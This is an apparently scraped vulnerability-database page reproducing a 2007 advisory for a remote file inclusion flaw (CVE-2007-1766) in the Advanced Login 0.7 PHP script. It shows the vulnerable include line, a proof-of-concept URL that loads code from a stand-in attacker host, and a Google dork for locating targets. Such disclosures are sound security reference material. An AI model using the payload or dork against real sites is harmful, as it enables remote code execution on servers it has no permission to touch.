Lucene search
+L

Advanced Login 0.7 - 'root' Remote File Inclusion

🗓️ 29 Mar 2007 00:00:00Reported by BithedzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Advanced Login 0.7 'root' Remote File Inclusion vulnerability in AdvancedLogin 0.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2007-1766
20 Jun 202603:37
circl
cve
CVE
CVE-2007-1766
30 Mar 200700:00
cve
cvelist
Cvelist
CVE-2007-1766
30 Mar 200700:00
cvelist
euvd
EUVD
EUVD-2007-1760
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1766
30 Mar 200700:19
nvd
prion
Prion
Remote file inclusion
30 Mar 200700:19
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
29 Mar 200700:00
securityvulns
------------------------------------------------------------------------------
Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability
------------------------------------------------------------------------------

Author		: Zeni Susanto a.k.a Bithedz
Date Found	: Maret, 29th 2007
Location	: Indonesia, Bandung
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: AdvanceLogin
version		: 0.7
vendor		: http://www.msxstudios.de
source url      : http://downloads.msxstudios.de/advancedlogin076.zip

---------------------------------------------------------------------------

Description:
~~~~~~~~
Advanced Login is at present for designers the best, for programmers and successful Web masters one the best Login of systems on the market. Templates which can be edited through simply and determined Functions can adapt you to Advanced Login 100% to YOUR Design, not as differently with usual systems around. Advanced Login is developed further and improved, an installation is constantly worthwhile themselves thus, even if the present function yet for your web page are not enough completely.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in profiledit.php

---------- profiledit.php---------------------------------------------------------
<?php
include($root."login/engine/couple.php");
mysql_query($profil_update_sql);
$result2=mysql_query($select_new_user_sql);
$row2=mysql_fetch_assoc($result2);
?>

-----------------------------------------------------------------------------

Input passed to the "root" parameter in profiledit.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?

-----------------------------------------------------------------------------

google d0rk:
~~~~~~~
"Advanced Login - Login"

-----------------------------------------------------------------------------
Solution:
~~~
- download new version in vendor URL

-----------------------------------------------------------------------------
Shoutz:
~~
~ My Wife Monik
~ K-159

-----------------------------------------------------------------------------

Contact:
~~~

     Bithedz[at]gmail[dot]com

-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2007-03-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.05109
42